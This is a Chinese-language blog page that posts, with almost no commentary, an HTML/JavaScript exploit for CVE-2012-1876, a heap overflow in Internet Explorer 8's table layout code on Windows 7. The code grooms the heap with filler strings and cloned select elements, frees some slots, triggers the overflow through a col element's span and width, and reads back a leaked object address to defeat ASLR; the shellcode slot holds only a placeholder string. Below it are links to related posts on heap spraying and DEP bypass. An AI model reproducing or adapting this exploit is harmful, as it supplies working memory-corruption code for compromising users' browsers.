cve-2012-1876 win7_ie8_leak_shellcode code

最新推荐文章于 2019-03-08 21:28:00 发布
最新推荐文章于 2019-03-08 21:28:00 发布
阅读量2.9k 收藏 1
点赞数
分类专栏: 漏洞利用 文章标签: leak ie string javascript function layout
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/instruder/article/details/7842960
版权 


<html>
<body>
<div id="test"></div>


<script>


alert("begin")

//var div_container = document.getElementById("test");
//div_container.style.cssText = "display:none";
var cloned = new Array();
var selob = document.createElement("select");
selob.w0 = "AMSZZABCDEFGHIJKLMN"//shellcode
selob.w1 = this;
selob.w2 = new Array();
selob.w3 = true;
selob.w4 = 0x41424344;
selob.w5 = document.createElement("marquee");
selob.w6 = undefined;
selob.w7 = null;
selob.w8 = alert;
selob.w9 = RegExp.$1;
selob.w10 = Infinity;
selob.w12 = 0x41424344;
selob.w13 = 0x41424344;
selob.w14 = 0x41424344;
selob.w15 = 0x41424344;
selob.w16 = 0x41424344;

	






var fillbuff = new Array();
var string_A="CORE1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

var string_B="CORE2BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB";

var string_C="CORE3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC";



for(var i=0;i<3000;i+=4)
{
	fillbuff[i]=string_A.substr(0,125);
	fillbuff[i+1]=string_B.substr(0,125);
	fillbuff[i+2]=string_C.substr(0,125);
	fillbuff[i+3]=selob.cloneNode(true);
}

alert("select")

for(var i=4;i<3000;i+=12)
{
	fillbuff[i]=null;
}
CollectGarbage();


alert("layout the heap")

</script>

<table style="table-layout:fixed" >
        <col id="132" width="41" span="9" >  </col>
</table>

<script language='javascript'>

var obj_col = document.getElementById("132");
obj_col.width = "42765";
obj_col.span = 19;


function overtar()
{
	var leak_addr = -1;
	alert(1)
 for ( var i = 2; i < 3000; i+=4 ) 
 {
		
                if ( fillbuff[i].length > (0x100-6)/2 ) { // overflowed
		    leak_index = i;
                    //var leak = fillbuff[i].substring((0x100-6)/2+(2+8)/2, (0x100-6)/2+(2+8+4)/2);
		    var leak = fillbuff[i].substring((0x100-6)/2+(2+8+12)/2, (0x100-6)/2+(2+8+12+4)/2);
                    leak_addr = parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 );
		    //mshtmlbase = leak_addr - Number(0x001582b8);
		    alert(leak_addr);
                    break;
                }
	}

}
//get object address

setTimeout("overtar();",1);	

</script>
</body>
</html>


instruder
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2012-1876 Internet Exporter堆溢出漏洞分析
鬼手的博客
08-16 1898
文章目录漏洞描述IE浏览器组件介绍分析环境POC漏洞分析漏洞利用参考资料 漏洞描述 该IE浏览器漏洞的成因在mshtml.dll这个模块的CTableLayout::CalculateMinMax函数里,程序在执行时会以HTML代码中的元素span属性作为循环控制次数向堆中写入数据。如果此span值设置不当,那么就会引发堆溢出问题。 IE浏览器组件介绍 Internet Explorer体系结构的...
CVE_2012_1876堆溢出分析
weixin_30520015的博客
09-19 262
  首先用windbg附加进程ie页面内容进程,!gflag +hpa添加堆尾检查,.childdbg 1允许子进程调试,然后加载POC。 POC: <html> <body> <table style="table-layout:fixed" > <col id="132" width="41" span="1" &gt...
将一个文字的大集合按照第一个文字的首字母进行切分
热门推荐
JerryWu145的专栏
04-26 2万+
首先感谢看到的文章https://blog.csdn.net/chy555chy/article/details/51878226项目中有按照字母排序 并且展示类别的需求,可是后台太坑,只给了一大串json,转完之后是一个包含着所有信息的大集合,这个时候怎么破除了把他拉出来揍一顿外还可以用我这个类哦 ,不过注意,返回的是一个map,具体自己再去分吧,不过,我觉的返回map挺好,能够符合一般的需求废...
CVE-2012-1876漏洞分析
weixin_30622107的博客
03-23 157
0.POC文件 1 <html> 2 <body> 3 <table style="table-layout:fixed" > 4 <col id="132" width="41" span="1" >&nbsp </col> 5 </table> 6 <scr...
Exploit 编写系列教程第十一篇:堆喷射技术揭秘(上).part2.rar
08-07
Exploit 编写系列教程第十一篇:堆喷射技术揭秘(上).part2.rar
oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip
01-19
Oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip 是一个针对Oracle数据库系统的重要安全更新。这个补丁主要解决了一个在Oracle 11.2.0.1版本中的严重安全漏洞,该漏洞被标记为CVE-2012-1675...
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burp CVE-2018-999
09-20
标题中的"CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burp CVE-2018-999"提及了几个关键概念,首先,CVE(Common Vulnerabilities and Exposures)是用于识别网络安全漏洞的标准化系统。"CVE-2018-9995"指的是...
CVE-2014-0322.zip_cve_cve 2014 _zip
09-14
CVE-2014-0322,被称为“Critical GDI+ Remote Code Execution Vulnerability”(关键GDI+远程代码执行漏洞)。这是一个影响Windows系统中GDI+图形设备接口组件的严重漏洞。GDI+是Windows操作系统中用于处理图像和...
CVE-2018-2628-MultiThreading-master.zip_CVE20182628_cve-2018-262
最新发布
09-21
# CVE-2018-2628 # 用法:将需要检测的 ip:port 放入同目录下的url.txt文件中。然后运行:(代码93行处修改线程数) `python CVE-2018-2628-MultiThreading.py` Usage: Place the 'ip:port' to be detected into...
bbbbbbbbbbbbbbbb
gowuliao的专栏
12-01 1万+
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
linux - CRT -- SSH链接 - sftp - cron定时任务、
dazer的专栏
02-08 5624
好记星不如烂笔头,这里记录平时工作中用到的东西,不喜可以留言。 1:一台新Linx服务器,需要检查的几个东西 登录上去是否显示服务器的别名,方便区分服务器,搜索:root@后面的别名 查看是否支持中文,比如:ls --help 看是否是中文; 搜索:中文; 代码里面写的 字体,比如生成图片 或者 pdf、excel等使用的字体,是否存在? 查看时间是否正确,搜索: date ...
CVE-2012-1876:Internet Exporter MSHTML.DLL CaculateMinMax 堆溢出简单分析
墨鱼菜鸡
03-08 153
0x01 2012 Pwn2Own 黑客大赛 Pwn2Own 是世界上最著名的黑客大赛,意在激励白帽黑客们进行顶尖的安全研究。在 ...
堆喷射学习笔记~
weixin_30693183的博客
07-18 1995
分析网页上数据的存储: 堆 IE6 IE7 而言, 快速(在堆块大小与重复喷射次数之间找到平衡点), 稳定(每次堆喷射都能使目标地址指向NOPS) JS 上分配字符串 会变成 BSTR字符串对象,该对象有一个 头信息 + 终止符, 并包含原始字符串经UNICODE转换后的字符串 ...
cve-2012-1876漏洞分析
小强的博客
11-15 1599
关于调试其他文章有,就不重点介绍了,主要介绍一下漏洞原理,汇编代码,以及漏洞的利用过程。 poc.html:   function over_trigger() { var obj_col = document.getElementById("132"); obj_col.width = "42765";
cve-2011-0027漏洞分析
小强的博客
07-25 2040
这个漏洞是整数溢出漏洞,漏洞环境为win7+IE8 ,调试工具为windbg,静态分析工具为IDA。 主要参考《漏洞战争》相关介绍,实际分析了一下。 首先启动页堆。 打开IE8,windbg附加进程,然后IE打开poc文件。 poc.html文件如下: function Start() { localxmlid1 = document.getElementById
CVE-2012-1889漏洞利用
enjoy5512的博客
09-25 3732
ROP技术绕过DEP保护 Heap Spray技术绕过ASLR保护 CVE-2012-1889
HeapSpray+ROP绕过IE8的DEP防护 ——堆喷射技术利用超星老漏洞
huhu2017的专栏
08-07 6049
堆喷射技术已经发展很多个年头了,相关的研究也挺多的,虽然现在Win7、Win8系统下的利用越来越难,但是该技术仍然是可用的,比如最近新出的IE8 use after free漏洞(CVE-2013-1347),Metasploit里的利用代码就是使用堆喷技术及ROP实现Shellcode的布置和绕过DEP防护的,网上有关的资料不多,0Day2书中有关的内容并不多,只是简单介绍了HeapSpray技
Heap Spray:高危漏洞的垫脚石
liwei8703的专栏
11-16 1414
<br />Tags: Heap Spray | 信息安全 | 高危漏洞<br />网络木马已经成为当今网络世界里最大的危害,而它们的散播源,则来自各个知名或不知名的网站,经由网页浏览器破窗而入,悄悄地在受害者的系统里扎根潜伏,最终给受害者带来一定的损失,这是一种几乎无法完全防御的瘟疫。<br />http://www.chip.cn/index.php?option=com_content&view=article&id=1543:chipheap-spray&catid=7:test-technolog

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值